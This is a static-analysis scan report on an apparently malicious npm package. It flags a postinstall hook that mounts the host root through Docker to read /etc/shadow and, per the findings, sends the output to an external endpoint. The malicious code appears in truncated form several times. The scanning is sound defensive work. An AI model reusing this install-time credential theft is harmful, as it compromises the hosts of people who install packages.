Static Scan Results
scanned 4h ago · by rust-scanner
Static analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
High-risk behavior combination matched malicious policy.
Decision evidence
public snapshot
Behavioral surface
No License
Source & flagged code
3 flagged
package.json
•scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.json
•scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.json
package.json#scripts.postinstall
"const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').toString(...
Critical
Command Output Exfiltration
Source executes local commands and sends command output to an external endpoint.
package.json#scripts.postinstall · L1
Findings
2 Critical · 1 High · 2 Low
Critical · Red Install Lifecycle Script · package.json
Critical · Command Output Exfiltration · package.json#scripts.postinstall
High · Install Time Lifecycle Scripts · package.json
Low · Scripts Present
Low · No License